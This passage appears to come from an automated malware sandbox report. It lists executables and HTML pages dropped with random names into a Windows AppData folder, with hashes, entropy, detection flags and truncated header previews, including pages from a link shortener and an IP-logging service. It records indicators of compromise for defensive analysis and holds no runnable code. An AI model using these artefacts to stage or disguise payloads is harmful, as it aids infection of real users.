                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="bkIgx8Jnc0uMgGltcI99w2HJsgheg67V6NBD530q">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\XbJnQ7YPZT43Q5vvoXLuAoSq.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.x...............................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\YHw4f8SZUCkdAWRXPfF1qOas.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.................................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.fL..5L..5L..5...5N..5k..5X..5k..5&..5k..5`..5...5C..5L..5...5k..5J..5k..5M..5RichL..5................PE..L...?..e.............................3............@.................................Ua......................................d...........X...............................................................@............................................text...\........................... ..`.rdata..............................@..@.data....-....... ..................@....rsrc...X...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\buQDl25QOPcDefNxAl6eKA66.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\cUZyyg5Iay7EkA1LG3XxNCAW.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\heli0xf9eUcd5qaTU2WhBrox.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\kCfcZTexs2vlrkxr2iahpjn0.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\nPQO8Z9byTKoW0YecEtJrQN4.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\nqutQ9rgLeAHNtyWdA1aXp1F.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.605017626199463
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QpYvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:jbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:DCDC0E11DB8E41D2820D5795541A9A31
                                                                                                                                                                                                                                                            SHA1:53C1D8B34BFB19D317396215009C578BDCA4C588
                                                                                                                                                                                                                                                            SHA-256:9620D42FC1944BDA67B72BC68E33A9DFDCB598F4AB795F80DB8FAEEB98D1F31D
                                                                                                                                                                                                                                                            SHA-512:DE5B0CBD74CEE1FD4A9E861B233F97B491C13C041F6B1E46203D406DC22501AF7B3FA6506668673684E4B29CB6BBE0156F4EF31BC73C0490A137D792F4B19064
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="FJNDnYI5mDUPWn1na0VszHBNAXQlUkP2CQRFMTTa">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\pdCLEldSyO5Ik39YE4kJVbXN.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.x...............................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\qn8N72lxWeACAPN7HO6efjE8.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.596757195928014
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q1vbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:IbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:5D75F2DA9A442FAC0B2BD9BFF04E909E
                                                                                                                                                                                                                                                            SHA1:4D186A164734C2DDFBEAD5C91646C4FE3CA76C5C
                                                                                                                                                                                                                                                            SHA-256:B3FA13B612AAA4979A7E36D879F37E673EAB817A39266152EA7930A1826C37EC
                                                                                                                                                                                                                                                            SHA-512:67710938384BFB132781F60B49AC07DF40D85C025D91151930476AF0F91F00554F74BADEE7D1137DF02348226FAE9F00F7DED82DB8A4CEB808C6B4AE700496B0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="TwACNll0R4RSVlFJopOZJncjv1Fy0gqNjFO84q0I">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\vODV6f1qBtycrG7AEUewXqSZ.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.594677771219723
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q3svbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:6YbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:74446C42022C98940CD36557F86CF70F
                                                                                                                                                                                                                                                            SHA1:7BDA0A0ADF388D0A8453E6ABF95813C0FFA004FE
                                                                                                                                                                                                                                                            SHA-256:7B938756330EB7F068A6CEF946E48DA88A9DC29436B74D53C3E93CCC5723DC3C
                                                                                                                                                                                                                                                            SHA-512:84821078B56644983DE24D42B5D6F09418A6A494501222A91076E1F7952AF7500DA99A2EE3F7E3521A2A70D175B9740B5D4E29B7C1871BAC59A54554A4F45A2F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="BOPOOga9PnHIY4Wjqn43t1H2YlnkF1vf5vVtMpYI">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.fL..5L..5L..5...5N..5k..5X..5k..5&..5k..5`..5...5C..5L..5...5k..5J..5k..5M..5RichL..5................PE..L...?..e.............................3............@.................................Ua......................................d...........X...............................................................@............................................text...\........................... ..`.rdata..............................@..@.data....-....... ..................@....rsrc...X...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\wgtZ5oDAxtz8XmZjy9Pg8rRQ.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\xBWhJ9fAo9Iu3r2QPWYsNC0n.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
